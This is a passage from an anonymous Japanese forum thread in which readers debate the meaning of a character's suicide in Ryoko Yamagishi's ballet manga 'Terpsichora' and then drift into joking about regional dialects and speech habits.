422 :花と名無しさん:2007/01/16(火) 14:05:23 ID:???0
10巻暗いよね♪

423 :花と名無しさん:2007/01/16(火) 14:34:54 ID:???0
踊れない わたしは何の 価値もない      五・七・五

424 :花と名無しさん:2007/01/16(火) 14:46:36 ID:???O
それにつけても 金の欲しさよ

425 :花と名無しさん:2007/01/16(火) 15:53:14 ID:???O
医者は逃げよと言われながらも

426 :花と名無しさん:2007/01/16(火) 16:57:53 ID:???0
恋をした斎宮など何の力もない

427 :花と名無しさん:2007/01/16(火) 17:12:02 ID:???O
ピトッ
ふふっ漫画の邪魔をしてはいけないよ?
僕は素敵なひとを見つけたんだ
信じられるかい?キミ

428 :花と名無しさん:2007/01/16(火) 17:28:05 ID:???0
>>412
あーわかるなあココ
>姉がバレエを続けられなくなっていきそうな苦悩から自殺への道が、妹の芸の
>肥やしって、作者の妹贔屓も勘弁してほしい。
芸の肥やしってのだけがどうもご都合主義だね
ショックでガタガタに崩れるとかバレエから離れるとか一家離散でも
あのチカの死を肥やしにされるぐらいなんかよりマシだった・・・
ま商業漫画的にはダメになるけどw
自分は2人姉妹の妹だから自分に重ね合わせて妹贔屓がどうとかは全くないです
ギシ漫画を読んでの感想

429 :花と名無しさん:2007/01/16(火) 17:48:46 ID:???0
10巻の表紙ってどこで見られるの?

430 :花と名無しさん:2007/01/16(火) 17:50:09 ID:???O
『タッチ』は、あの弟は死ぬだろうな〜とか思ってたけどな。
野球マンガで出来の悪い方が主役だったし
でも千花は
「規格外れでも、やって行けるのはプリマだけ」とか言ってたしプリマを目指す道もあったような…
作者も迷った感じがする

431 :花と名無しさん:2007/01/16(火) 18:12:06 ID:???0
>>429ダヴィンチ

432 :花と名無しさん:2007/01/16(火) 19:28:34 ID:???O
「芸の肥やし」ねぇ…。
それは一面的でしかないと思うけどな。

妹贔屓、ユキの芸の肥やしの為だけにチカが死んだわけではないと思う。
なぜチカが死に至ったか、その死によって周囲にどの様な影響を及ぼしたか
読者に色々な事を思い巡らしてもらうためにあの漫画を描いたんだと思うけどな。

だからチカは死ななきゃならなかったし、ユキの芸の肥やしはその影響の一部分でしかないと思う。

433 :花と名無しさん:2007/01/16(火) 21:08:54 ID:???0
>432
>ユキの芸の肥やしはその影響の一部分
これには同意だけど、その他の場面でいろいろと六花びいきは感じる。

434 :花と名無しさん:2007/01/16(火) 21:11:34 ID:???0
まあギシ先生の好みなんだろう。
全10巻ていう表記が気に入らない。

435 :花と名無しさん:2007/01/16(火) 21:33:39 ID:???O
一応主人公だしなあ

436 :花と名無しさん:2007/01/17(水) 01:21:32 ID:???0
>>432
「芸の肥やし」と書いた>>412です。

イジメで死なない子は現実の世界でいくらでもいるし、そもそも現実の
世界では、バレエを本気でやってる子は学校では浮きまくりだよ。
だいたいスポーツと違って学校の名前が出る訳じゃないからね。
(スポーツは、その学校の部活所属じゃなくても学校の名前が出るのに
面白いね) でも義務教育だから通ってる。

バスケットやってて下肢障害になった子が車椅子バスケットへ進む時代だし、
耳や指の故障で演奏家になれない子が作曲へ進む時代だよ。
器械体操で身体いためた子がコンテンポラリーダンスで再起する時代だよ。

母親がクラシックバレエ以外の道を認めないから、死にました って親子問題を
問う方向によめないこともないけど、そりゃぁ安直でしょう?
作者がサドっ気起こしておもいっきりチカちゃんに辛い思いをさせちゃおうって
(竹宮さんはご贔屓キャラにそれをやるのが大好きなんだけど)、趣向あったっけ?

っつーわけで、「芸の肥やし」と書いた訳ですが。

437 :花と名無しさん:2007/01/17(水) 02:35:37 ID:???0
妹びいきもなにも、そもそも主人公はユキだし、
あれほどの過酷な喪失体験をさせた意味は、続編で
読めるものと私は思ってるけど(本当に続編、はじまるんだろうな?)。
そりゃ、チカちゃんがあまりにイイ子で綺麗で、本当に
「よく知っている親戚の子」みたいな存在に感じられるほどに
描写したギシ先生が悪いっちゃ悪いんだけどさ、
そういう理不尽さ、悲しさこそが、リアルなんじゃない?
物語のために、あれほど血の通った人間として描いたチカを死なせてしまう
そのシビアさに、やっぱり私は尊敬の念を禁じえません。


438 :花と名無しさん:2007/01/17(水) 04:27:42 ID:???0
どこがシビアなんだろうw
むしろ安易だと思ったけどな

439 :花と名無しさん:2007/01/17(水) 06:53:42 ID:???0
母親がどうか、じゃなくチカ自身がバレエ以外の生き方を結局認めることができなかったのが自殺の
最大の原因でしょ。それが環境の問題とか、なんどかあったかすかなバレエ以外の生き方を選ぶチャ
ンスがあったとかというのは別として。
イジメは二次的な問題にすぎないし。
車いすダンスとかがある、と書いている人はいるけど、チカ自身がバレエそのものに対して固執してい
るのは当初から描かれていて、それこそがチカのアイデンティティと化していることもわかる。
きちんと理由は描写されてる。
それが納得できないのは、チカ大好きだから、チカの致命的な欠点(自分に対するいろいろな意味で
の柔軟性の極端な欠落)からは目をそらしてるだけに見える。そしてこの欠点は相当致命的。

440 :花と名無しさん:2007/01/17(水) 07:53:08 ID:???0
>>439
んじゃ、作者はチカを
「クラシックバレエ以外の世界で生きる事は一切考えられない視野狭窄の
人間」として描きたくて、あのような描写をしたってこと?
それにしちゃ、なんでも良くできる子だったよね。

たとえば、曽根作品の「昴」みたいな子が身体の故障で挫折して堕ちていった
ような感じなら、それでもイイ描写になるし、むしろそれこそ相応しいと
思えるけどね。

チカはそういった欠点があるからこそ自殺であの作品から消すしかなくて
「ユキの芸の肥やし役」としてあの作品から消えたわけじゃないと思いたい
ってか? チカ嫌いならそう思いたいのも無理ないけど。

「自分に対するいろいろな意味での柔軟性の極端な欠落」 は なによりも
チカ本人が自覚してる事でしょ? そういう自覚のない子にとっては
致命的な欠陥だが、自覚ある以上致命的にはならない。

441 :花と名無しさん:2007/01/17(水) 08:36:05 ID:???0
言葉尻に捕らわれ過ぎのような・・・。

442 :花と名無しさん:2007/01/17(水) 09:09:31 ID:???O
おお、怖い怖いチカファンはw

しいて言うなら、こういうチカファンを生み出し、「何故死ななければならなかった」「チカが死んだ意味は?」と
思わせる事自体が作者の意図なんだよ。
そう考えさせる事自体が、チカが死んだ意味。
そこまでチカは血の通った人間で、感情移入できるキャラクター作りがされてる。

現実でも「何故あの子が」と思うことはあるでしょ。


「ユキの芸の肥やし」の為だけなら、「超絶美少女が10巻かけてry」
という事にはならない。もっと早くに死んでるはず。

443 :花と名無しさん:2007/01/17(水) 09:20:40 ID:???0
そろそろメアド交換して個人的にやってもらえませんか?

444 :花と名無しさん:2007/01/17(水) 09:28:32 ID:???O
千花祭りの時はこんな議論が連日続いてたなw
いい加減双方落ち着いたかと思ったけど、単にくすぶってただけなんだな〜。
この事はギシという漫画家を語るのにかかせない永遠のテーマになるかもね。

445 :花と名無しさん:2007/01/17(水) 09:30:57 ID:???0
そんな大層なものか? ただの粘着でしょ

446 :花と名無しさん:2007/01/17(水) 09:40:01 ID:???0
>>442
だから、チカフアンの捉え方はその逆だよ
「超絶美少女が10巻かけてry」 という事を、「ユキの芸の肥やし」(起爆剤)
として使うってことが ど〜もねぇ....ってこと。

>>443
あのさ、作者の作品について語ってるだけだから、自分の気に入らない流れの
時には、自分でもう1本好みの流れを作ってその流れにも人を集めれば?
 「2chのスレっつーのは、同時にはたった1本の流れしか許されない」 
というようなもんじゃないだろ?

447 :花と名無しさん:2007/01/17(水) 09:42:10 ID:???0
>>445
ギシ作品読者には粘着じゃないヤツもいるのか? 粘着しかいないよ。

448 :花と名無しさん:2007/01/17(水) 09:49:07 ID:???O
どちらにしろチカの死が、今の漫画界に一石を投じたのは間違いない。
どの書評を読んでも「衝撃作」という言葉が出て来るし。
ここの人が考えている以上にテレプシは話題作だよ。

449 :花と名無しさん:2007/01/17(水) 09:55:51 ID:???0
>>446
あのさ、だったら気に入らないレスが付いてもスルーすれば?

朝から顔真っ赤にしてなにやってんだか

450 :花と名無しさん:2007/01/17(水) 09:56:40 ID:???O
>>446
「芸の肥やし」部分が千花の死後一話分しか描かれてないからまだなんとも言えないな。
第二部全てがそれだという可能性もあるけど、全く違う話になる可能性もある。
第二部がない可能性も…

現時点では「チカの死がユキの芸の肥やしになった」というのは作品の一部分だけだと思うけど。

451 :花と名無しさん:2007/01/17(水) 10:06:44 ID:???0
>>449
あんた>>442じゃないよね。

>>442が「自分はユキ贔屓なんで、チカ贔屓のあんたのいうことはウザイ。
だからもうレスつけないで」というんならスルーするけど。そうじゃないでしょ?

452 :花と名無しさん:2007/01/17(水) 10:09:22 ID:???0
あんた呼ばわりコワス

453 :花と名無しさん:2007/01/17(水) 10:30:45 ID:???0
あんた前からムカついてたのよ!

454 :花と名無しさん:2007/01/17(水) 12:51:01 ID:???0
ええっと 気の利いた科白台詞セリフ・・・

「あんたはわたしだ!」 にっこり

これでいいカナ?

455 :名無しんぼ@お腹いっぱい :2007/01/17(水) 12:54:03 ID:???0
>>454
松井の鼻が………

456 :花と名無しさん:2007/01/17(水) 12:57:48 ID:???0
すげー粘着。チカちゃんはそりゃ私も好きだけど、
なんか感情移入過ぎてこわすぎるよ。
なにそのかみつき…。落ち着けよ、フィクションなんだから。
自分と違う感想を抱くやつゆるさね、ってアンタが
一番そうなっとるよ>>深夜からの人

457 :花と名無しさん:2007/01/17(水) 13:12:22 ID:???0
千花の氏って安易?古い山岸スレの住民がいるこのスレでもあんだけ祭りになった
衝撃展開だったのに。(婆の言葉で立ち直ったと思ったらアボン)

まあ安易だと思う人もいるんだろうけど自分はとっても千花の自殺って衝撃的だった。
 あーでも自分はそれよりふとみも自殺を考えてたって方が衝撃だったな。

458 :花と名無しさん:2007/01/17(水) 14:33:22 ID:???O
>>457
確かにびっくりした
あんなに漫画でびっくりしたのは初めてだった
安易とは思わないのは、
漫画だし、作者であるギシ先生が考えたストーリーだから、て思ってるからかなぁ
読者だから、自分が安易とか決めつけるのはお門違いかな、
という認識というか

459 :花と名無しさん:2007/01/17(水) 14:42:34 ID:???0
散歩途中でうっかり立ち読みした発売日、
その日一日上の空になってしまうほどびっくりしますた
気持ちを昇華できず、祭りにも参加した



460 :花と名無しさん:2007/01/17(水) 14:45:08 ID:???0
コミックス組がこれからびっくりするんだろうな。

461 :花と名無しさん:2007/01/17(水) 15:06:30 ID:???0
はい…

462 :花と名無しさん:2007/01/17(水) 16:30:31 ID:???0
ふー、びっくりした。

463 :花と名無しさん:2007/01/17(水) 16:47:49 ID:???O
サイレントマジョリティを考慮してチカの死は安直という事にしますw

464 :花と名無しさん:2007/01/17(水) 17:38:47 ID:???0
みんな深〜〜〜く読んでるんだなぁ・・・と感心しました。
私は淡々と事実を受け止めるようにしか読んでないや。

465 :花と名無しさん:2007/01/17(水) 18:01:20 ID:???0
>>464
それが山岸作品の本来の読み方なのかも。
彼女の作品って、作中でどんなことがおこっても他人事のように客観視できる。

誰かに肩いれしたり、誰かを嫌ったりすることなく、「こんな人いるかもね」と
淡々と読める。狂気も、変態も、残虐な描写であっても、現実の広い世界なら
どこかにあるかもなぁ....と彼女の作品の中で起きてることならとさらりと
読める。話の流れを追う事、話の構成を楽しむことに専念(?)できる。

作者の作品の作り方が変わったのか?読者の側が変わったのか?
スレでのテレプシの話題って、ストーリィの流れよりも、キャラ語りが
多かったような。
千恵子さんを母として嫌い派VSよくやってる方だよ派 もけっこう凄かったし、
ユキは甘ちゃん派VSあの年齢ならあんなもん派 も凄かった 

466 :花と名無しさん:2007/01/17(水) 19:07:19 ID:???0
こういう、1素人が語れる場を得て、読者の方が変わったような気がする。

467 :花と名無しさん:2007/01/17(水) 19:29:38 ID:???0
自分、パソコン通信と呼ばれたころのnifty少女マンガ会議室(板じゃなくて
あそこではこう呼んでた) に出入りしてたけど、当時、山岸マンガの話を
してもここまでエキセントリックじゃなかったよ。(毛人のヴァカ〜はあったな)

皆が日によって変わったりしないID持ってて、コテハンで、議長と呼ばれる
交通整理人がいたからだと思うけど。

468 :花と名無しさん:2007/01/17(水) 19:50:02 ID:???0
>>467そりゃそんな所だったら今の時代でも角の立つ発言はできないから
ここのスレのように議論&あおりあいにはならないだろうなw

469 :花と名無しさん:2007/01/17(水) 21:18:31 ID:???0
>>467
今ならミクだとそんな感じだろうね。見たくないけど。

470 :花と名無しさん:2007/01/17(水) 21:19:23 ID:???0
>>446
ハゲドー
気に入らない話題が続いてると自分で話題変えもせずに
文句しか言えないやつ多すぎw
私はチカ話題好きだから激しく便乗したけどね

あー早く短編終わらせてくれないかな
さっさと第二部いってほしい
何が「全」10巻だ!

471 :花と名無しさん:2007/01/17(水) 21:30:46 ID:???0
遅ればせながらヴィリ第二話を読んだけど、娘の分かり易いやつれ描写(頬に線)に笑ってしまった。

472 :花と名無しさん:2007/01/17(水) 21:53:24 ID:???0
>471
前号のふらふらバターンな倒れ方も
すごくわかりやすかった。

473 :花と名無しさん:2007/01/17(水) 22:05:11 ID:???0
>>471
でもデーモン小暮閣下みたいに頬にトーン張るわけにもいかないしw

474 :花と名無しさん:2007/01/17(水) 22:14:50 ID:???0
ふとみが倒れる直前もあの線入ってなかったか。

475 :花と名無しさん:2007/01/17(水) 22:18:14 ID:???0
トーン張ったら、薬物中毒みたいなってしまうよ>>473

476 :花と名無しさん:2007/01/17(水) 22:24:50 ID:???0
>>466
ああ、それはものすごい思う
ちょっとでも気に入らない展開になったり
自分が許容出来ないキャラが出てくると
2chて作者自身をものすごい叩くよね

この世界が自分の思うとおりにならないように
一人の人間が生み出す作品が
自分の望みどおりになる訳ないと思うんだがなぁ…

言い方は悪いが何で漫画であそこまでヒステリックになれるのか




477 :花と名無しさん:2007/01/17(水) 22:34:43 ID:???0
素人が評論家気取りで作品を叩くというのはよく見る様になったな。
普通のホームページでもあったけど、匿名掲示板が出て来てそれの酷い物がごろごろ出て来た。
映画とか小説でもよく見るけど。

まあそれが良い所もあるんだけどね。

478 :花と名無しさん:2007/01/17(水) 22:42:08 ID:???0
以前出た話題かもしれませんが、チカちゃんて
秀才だけど天才じゃないですよね。
ユキちゃんは(おそらく)天才だけど。

479 :花と名無しさん:2007/01/17(水) 22:44:30 ID:???0
批評すんならもうちょっとちゃんと読もうよ、っていう人もいるんだな。
昨夜から暴れてるチカ信者みたいな。

480 :476:2007/01/17(水) 23:19:33 ID:???0
>>479
批判するならすれば良いと思うんだが
批判にすらなってない罵詈雑言が殆どだからなー

私は古い少女漫画読みだからなのか
キャラや物語にあんまり共感を求めないんだよ
それより作品そのものの完成度の方が全然気になるというか

でも今って「私が共感出来ない」ということが
ものすごい重要視されて語られるよね
あれは本当に不思議




481 :花と名無しさん:2007/01/17(水) 23:20:02 ID:???0
>>478
チカちゃんは「凄い努力家」として描かれているよ。それも地味な努力を
繰り返す根気強い子としてね。

チカちゃんがユキちゃんに「そのチカちゃんは、チカちゃんは って
いうのやめて!」ってきっぱり言ったシーンがあったけど、
茜にしてもチカにしてもクミにしても、ユキの何倍も努力家だし自分に課す
課題も厳しい。ユキの目からみて「恵まれてるな〜いいな〜」と
うらやましがってる描写はあるけど、彼女らも努力してるんだってこと
ユキが理解するまでには随分かかったよね。 そういう描写はけっこう
ユキの成長面を描く上でよかったかな と思う。


482 :花と名無しさん:2007/01/17(水) 23:31:22 ID:???O
国会議員の、コワい顔した片山さつきさんが、
官僚時代、部下としては与えられた仕事を目一杯努力して、優秀な成果を出すんだけども、
いざ上の立場になって指示を出す側になると、
あんまり力が発揮できないタイプだった
という話を聞いて、何となくチカちゃんが浮かんだ

483 :花と名無しさん:2007/01/17(水) 23:36:29 ID:???0
>>482
そりゃぁなんかなぁ....。
せめて、ダンサーとしてはそれなりに優れた人だったのに、指導者になって
みたら、どうも生徒をうまく導けないゴッシーを思い浮かべた方が自然だと
思うが。

わかり易いコンプレックスがエピソードとして描かれているせいか、
人間味あって嫌いじゃないけどね。ゴッシー。

484 :花と名無しさん:2007/01/17(水) 23:38:50 ID:???0
すごい努力家と言うと、明智ショウのなんかのマンガに出てきたすごい努力家
を思い出す。
 明智ショウのあのマンガの努力家は見てると心底ムナクソ悪くなるタイプに
描写してあったけど、チカちゃんも見方を変えるとあれに近くも見えるんだろうな。
そういやあの主人公も手話やってたし。

485 :花と名無しさん:2007/01/17(水) 23:47:34 ID:???0
手話?「あの主人公も」の「も」は何にかかってるの?

486 :花と名無しさん:2007/01/17(水) 23:54:56 ID:???O
>>480
桐野夏生スレで「グロテスク」読んで、
あの語り部ぽい姉に、とてもじゃないが共感できない!と憤慨してた人がいた
何か( ゚д゚)ポカーンとなったけど
あの姉の得体の知れない感じが、読者を惹きつけることはあっても
共感を得られようなんて書き方は、むしろ作者もしてないだろ、と
共感がないと憤慨、てのは何か違うと思う

487 :花と名無しさん:2007/01/18(木) 00:05:03 ID:???0
映画板だと「○○な所の主人公の心がよくわからなかった。説明不足だ!駄作決定」
っていうのが一杯いるよ。

488 :484:2007/01/18(木) 02:11:22 ID:???0
>485
なんかチカちゃんもボランティアっぽいことやってたような気がするけど?
手話はやってなかった?ならごめーん。テヘッ
の?って言う物のたずね方が普通に出てくるのが掲示板だなぁと
思う。地方で、の?て言い方しない地域だと上から物言われてる感じ
があるね。これも優等生がムナクソ悪く感じるのと似た心理現象か。

489 :花と名無しさん:2007/01/18(木) 03:03:43 ID:???O
の?

って普通に使わないの?
小学校で習った気がするがの?

490 :花と名無しさん:2007/01/18(木) 03:33:20 ID:???0
そうさの
国語の時間に習った気がするがの

491 :花と名無しさん:2007/01/18(木) 03:57:46 ID:???0
チカ信者、チカアンチ、ユキ信者、ユキアンチ、
山岸信者、山岸アンチ

こういう単語を文章に入れるやつのレスは煽り

492 :花と名無しさん:2007/01/18(木) 04:00:35 ID:???0
そうさの
NGワードに登録すればいいんじゃないかの

493 :花と名無しさん:2007/01/18(木) 04:14:39 ID:???0
>そうさの
マシュウですか?

キャラ重視で作者批判派は、なんか、TVドラマ好きの人の見方に似てる。
キャラに感情移入して、物語全体の構成を見ないというか。

494 :花と名無しさん:2007/01/18(木) 04:22:18 ID:???O
>>493
マシュウが亡くなったとき、泣いた。・゚・(ノД`)・゚・。

495 :花と名無しさん:2007/01/18(木) 06:27:27 ID:???0
なんでマシュウは独身だったんだろ、マリラ(だっけ?)も…。
ブサイク兄妹なんだろうか。

496 :花と名無しさん:2007/01/18(木) 08:52:09 ID:???0
>>488
チカは、ボランティア部で手話やってたよ。

の?程度でいちいちムカついてると疲れるんじゃない?
マンガにも、の?はたくさん出てくるでしょうに。
てか、私は東日本出身関東圏在住なので、全然気にならない。
上から物言われてる印象は、全く無い。その程度の表現だと思うよ。

497 :花と名無しさん:2007/01/18(木) 08:56:17 ID:???0
このスレを見ている人はこんなスレも見ています。

が、絵本板のスレと相互リンクになっているのが笑える。
私以外にも、何人もいるのか?

498 :花と名無しさん:2007/01/18(木) 09:39:22 ID:???0
私は関西の方の人の
「○○の(または『ん』)と違う?」という言い方にムッとする。
「私は○○だと思うけど、あなたはどう?」というニュアンスらしいんだが、
「私のいうことに『違うよ!』とでも言いたいのか!?どうなんだよ!?」って
脅されてる気分がする。

もう慣れたけど、最初はリアル社会で関西からきた人と話していて凄く怖かった。

499 :花と名無しさん:2007/01/18(木) 09:59:42 ID:???0
地方で、の?て言い方しない地域って何処だろう
488の住んでるとこがそうなの?

500 :花と名無しさん:2007/01/18(木) 10:01:16 ID:???0
>>498
リアル社会ってなんだよ

501 :花と名無しさん:2007/01/18(木) 10:06:58 ID:???0
>>500
「ネットでそういう語調のレスがついた」じゃなく、
「普通の生活でそういう言い方をされた」っつー意味です。

502 :花と名無しさん:2007/01/18(木) 10:17:17 ID:???0
>>488
こいつ痛えなww

503 :花と名無しさん:2007/01/18(木) 11:24:49 ID:???O
の? を使わない地域出身です。
子供の頃使ってる子嫌われてたなぁ。
方言の実感薄いから〜の?〜だよ、〜だわ、というのは
テレビや漫画の言葉をリアルで使う痛い人、感覚だったみたいで。
その子は家庭が複雑でテレビで育ったかららしいが。
大学でのを使う男に慣れるまでかなりかかった。
頭じゃわかるけど、どうにも気持ち悪くて。

でもネットや書き言葉じゃ標準語がデフォだから
何も感じないが…

504 :花と名無しさん:2007/01/18(木) 11:46:41 ID:???0
「〜だわ」には2種類あるよね。
昔の女の子の「あら、いやだわ」という「わ」(それまでより音を上げる)と
自分北海道なんだけど、おっさんでも「いや〜だめだわ」という「わ」
(それまでより音を下げる)
わかりずらかったら「最終兵器彼女」でも「動物のお医者さん」でも
男が「〜だわ」つかってるからわかると思う。

>>503はどっち? 
(ここで「どっちなの?」と書くと「どっち?」を柔らかく言ったつもりが
「どっちなのかさっさと答えろ!」と言ってるようになるのかな?
「の」をそれまでより高い音にするのが前者、低い音にするのが後者)

505 :花と名無しさん:2007/01/18(木) 12:12:23 ID:???O
の?を使わない地域…
なんばしよっと?
みたいな博多弁みたいな感じ?
博多の人に、の?て言うよ、て言われるかもしれないけど

506 :花と名無しさん:2007/01/18(木) 12:18:35 ID:???0
>503
自分もネットで使う言葉は普段の話し言葉と違うから何とも思わない。
漫画の舞台が地方都市でもみんな標準語使ってるのを
変に思わないのと同じ感覚だな。

507 :花と名無しさん:2007/01/18(木) 12:25:04 ID:???0
全然気になんないけどな。
〜なの?〜だよ、とかってふつーに使うじゃん
503って普段から周りに変わってるねーって言われてそう

508 :花と名無しさん:2007/01/18(木) 12:29:25 ID:???0
>>507
普通の人はこだわらない様な事をねちねちと長文書くあたり、
かなりの変人くさく見えるw

509 :花と名無しさん:2007/01/18(木) 12:57:33 ID:???0
の?議論か。なんかおせちレベルの議論を思い出すなw

それより自分はネット語の「〜でそ」のが嫌だな。少年漫画板の嵐が使ってたから
イメージ悪いだけかもしれないけど。


510 :花と名無しさん:2007/01/18(木) 13:24:18 ID:???0
>>509
「してみそ」は?

511 :花と名無しさん:2007/01/18(木) 13:25:22 ID:???0
>>493-494
叔父にリアルマシュウがいるんだよ(;´Д`)
ああいう人って身内だと感動がどうとかの場合じゃないw
未だに独身でもう多分60↑で色々やばいよ…
ギシ漫画だとかぽちーの原作とはいえ
クリスマスのオバちゃんが女マシュウみたいだったな
自意識過剰で対人面で苦しむ人

512 :花と名無しさん:2007/01/18(木) 13:34:20 ID:???0
流れ豚切りで話が一気に早朝に戻ったな。

>>511
あのぉ....団塊の世代は独身者多いですよ。
だって男性は年下の女性の人数少ないもん。
女性は年上の男性の人数少ないし。
当時はまだ、男女年齢差で男が数才上が適切とされた時代だし。

だから24年組は独身多いのよ〜〜。

513 :花と名無しさん:2007/01/18(木) 14:05:26 ID:???0
>>510してみそは2ちゃんではまだ見たことないなwなんか昭和の香りがする。

514 :花と名無しさん:2007/01/18(木) 14:30:13 ID:E3fd0cbA0
>>513
私は、「してみそ」は、2ちゃん以外ではまだ見たことないな。

515 :花と名無しさん:2007/01/18(木) 15:15:25 ID:???O
してみそ、と聞くとわけわかめとか思い出す。
27円は当時は流行ってたの?
ギシ語?

516 :花と名無しさん:2007/01/18(木) 15:22:57 ID:???O
なんだこの流れwww

517 :花と名無しさん:2007/01/18(木) 16:03:23 ID:???O
たまーに
空気読まずに

美しい人生よ 限りない喜びよ この胸のときめきを あなたに

とか歌いたくなるスレ

518 :花と名無しさん:2007/01/18(木) 16:10:38 ID:???0
てst

519 :花と名無しさん:2007/01/18(木) 16:54:41 ID:???0
命かけてと 誓った日から 

  ≪中略≫

あの素晴らしい 愛を もう一度〜

520 :花と名無しさん:2007/01/18(木) 17:05:47 ID:???0
>>515はじめ27円の意味理解できなかったな。

521 :花と名無しさん:2007/01/18(木) 17:26:41 ID:???O
自分もわかんなかった。
このスレのテンプレ見てはじめてわかったよ。

522 :花と名無しさん:2007/01/18(木) 21:07:56 ID:???0
>>484=>>488=>>503か。
キモイ上に自分語りが痛いオバハンだなw

523 :花と名無しさん:2007/01/18(木) 21:45:01 ID:???0
50歳こえてんでしょ、きっと。

524 :花と名無しさん:2007/01/18(木) 22:33:46 ID:???0
>>498
漏れ関西人
「〜違うん?」は「〜じゃないですか」と同意義で使うわ

525 :花と名無しさん:2007/01/18(木) 22:45:38 ID:???O
実際の意味じゃなくてよその人が聞いた時の感覚の話でそ?

526 :花と名無しさん:2007/01/18(木) 22:46:32 ID:???0
>>498です。
レスどうもです。
で、もし「○○と違うん?」と関西の人に言われた時に、同意できなくて
私が「私はこうだと思うけど....」と言いたい場合、どういう言い方を
すればいいんですか?
若いコみたいに「びみょ〜」とは言えないし....。

527 :花と名無しさん:2007/01/18(木) 22:55:13 ID:???0
もういいって。

528 :花と名無しさん:2007/01/18(木) 22:56:31 ID:???0
「あー、違うわぁ。こうこうだと思うんだけど」かダメなの?
なんというか、実際の言葉よりイメージに怯えてるように見える。
威圧的な言い方でなければ、九州人から見ても決して怖い言葉だとは思わないんだけど。

いずれにせよ、地域ごとに言葉があるのは自然なことなんだからいちいち気にするほどの
こっちゃない。
それはそーゆーもんだ、と思えばいいだけのもの。
そういう自分の物の言い方だって、よその地方の人からすれば違和感ありだったり、不愉
快な思いをさせたりしてるかもしれないんだしね。

529 :花と名無しさん:2007/01/18(木) 23:23:39 ID:???O
方言ネタって誰にでもわかるし、みんな何かしら経験があるから
みんな一言申したくて伸びやすいんだよねぇ。
ニフティの時代からそうだった。

あと食べ物ネタとか。

530 :花と名無しさん:2007/01/18(木) 23:25:14 ID:???O
アエラコミックというアエラのムック本を図書館で借りてきた
作家の長嶋有さんと萩尾望都さんが対談してて、
テレプシのことにも触れてるから何スレか前で、その部分を読んだ人が引用してくれた本
少し前に少し話題になった生徒諸君の作者の記事もあって、
顔も初めて見た
20年来のアシ二人と共に…
三人の服装が作者の漫画から抜け出てきたようなセンスでしたw
ちなみにイヌ派のよう(イヌはかわいかった)
しかし、作者はネコの顔が一面に描かれてる、ニットを着用だった…('A`)

531 :花と名無しさん:2007/01/18(木) 23:46:44 ID:???0
>>528
九州の人の言葉はもっと怖い....。

532 :花と名無しさん:2007/01/19(金) 00:04:42 ID:???0
大阪在住ですが、九州の友達たちの言葉は
テンポが早くて、言葉も飾り気なさすぎで直球なもんで
結構ビビります。

533 :花と名無しさん:2007/01/19(金) 00:15:22 ID:???0
北海道も直球。テンポは速くない。
ぶっきらぼうだから「気遣いがない、唯我独尊」って感じかも。

相手のために何かする時に、北海道は「○○しちゃる(してあげる)」
実際相手のためにしてあげるんだからストレートでわかり易い。
相手のために何かする時にも「○○させてもらう」って言う関西人には
どんな感じで聞こえているんだろう。

534 :花と名無しさん:2007/01/19(金) 00:27:42 ID:???0
関西人が気にしてるのは突っ込みポイントだけだから安心して。

535 :花と名無しさん:2007/01/19(金) 00:31:23 ID:???O
関西の大学に行って衝撃だったのは、
教科書を読むにも、関西訛りが入るとこだった
語尾の、〜していますの、す、にアクセントが入る
あと先生も せんせえ、て最初の、せ、にアクセントがつく
あとは、田中さんw
た、にアクセントが入るんだよね
今は亡き逸見さんが、大阪出身で、
アナウンサーになるために必死でアクセントを矯正したという話があるけど、
本当に、大変だったろうなぁと思う

536 :花と名無しさん:2007/01/19(金) 01:06:11 ID:???O
まだやってたwww
何のスレだよw

537 :花と名無しさん:2007/01/19(金) 02:15:32 ID:???0
まだやってたんのか?
一体何のスレやねんww

538 :花と名無しさん:2007/01/19(金) 02:58:08 ID:???O
まだやってたの?
一体何のスレなの?

539 :花と名無しさん:2007/01/19(金) 07:10:56 ID:???0
まだやっでたんけ?
いってえ何のスレだへ?

540 :花と名無しさん:2007/01/19(金) 11:22:06 ID:???O
まんだへでらっけんが!
なんとどいんたスレなんだべ?

541 :花と名無しさん:2007/01/19(金) 12:00:53 ID:???0
まだやってたのけ?
一体なんのスレだっちゃ

542 :花と名無しさん:2007/01/19(金) 12:26:32 ID:???0
まだやってたんでがんすか?
一体なんのスレずらぁ

543 :花と名無しさん:2007/01/19(金) 12:58:01 ID:???0
もういいってww

544 :花と名無しさん:2007/01/19(金) 13:31:38 ID:shGW9My50
10巻また平積みなんだろうなぁ・・・。

545 :花と名無しさん:2007/01/19(金) 14:18:50 ID:???0
>>537-542
このノリの良さがギシスレのいいとこwww

546 :花と名無しさん:2007/01/19(金) 14:42:07 ID:???0
>>544
なんで?平積みだと困るの?

547 :花と名無しさん:2007/01/19(金) 14:45:11 ID:???0
http://www.youtube.com/watch?v=LTcnPaSwuhY

千花に捧げる歌。

548 :花と名無しさん:2007/01/19(金) 15:54:36 ID:???O
だから
頑張った少女漫画家は、登場人物達が笑いをくれるんだよ
びみょ〜で、シュールな笑いで、後から笑いがこみ上げてくる
誘い笑いなしのお笑いだよ

549 :花と名無しさん:2007/01/19(金) 19:46:46 ID:???0
>>476
遅レス&スレチ&長文でスマソだけど、ネットを通して
前から似たようなことを強く感じていたので、ここで同意してみる。
本来、自分の思いと、必ずしもその思いの通りでには行かない現実とがあるもので、
そういう事態を消化したり対応したりしながら人は成長するような感じだと思う。
ネット書き込みは、そういう現実のあり様から逃げて、
自分の思いを強行する場所を与えるような面があるように感じられる。
ネットでのカキコを通して、自分の気に入らないことを排斥するとか。
例えば「自分は優れている。他は馬鹿。自分は悪くない。他が悪い。」
といった含意のある書き込みをすることで、本人にとってはそれが既成事実になり、
自分に都合のいい思いに裏づけを得る場をネットに見出すようなのとか。

でも率直な意見を交換できるっていうのも2ちゃんのよさだし、バランスの問題なんだろうけど。
ギシスレは伊達に年齢層高いわけでなく、上記のような人はほんの一部で、
多くの住人は大人な方だと思ってる。ギシギシしやすいとしてもw

550 :花と名無しさん:2007/01/19(金) 19:48:29 ID:???0
やっぱ山岸スレって年齢層高いのかなあ?
自分30台前半。

551 :花と名無しさん:2007/01/19(金) 20:00:09 ID:???0
そりゃ、アラベスクや妖精王の連載時期を考えれば。

テレプシ第2部に、美少女か美女のキャラを投入してほしい。
六花も可愛いが、それだけでは千花の抜けた穴は埋められん。

552 :花と名無しさん:2007/01/19(金) 20:19:57 ID:???0
>>550
何を今更w

553 :花と名無しさん:2007/01/19(金) 20:34:41 ID:???0
>>551
個性的美女に成長した空美が…

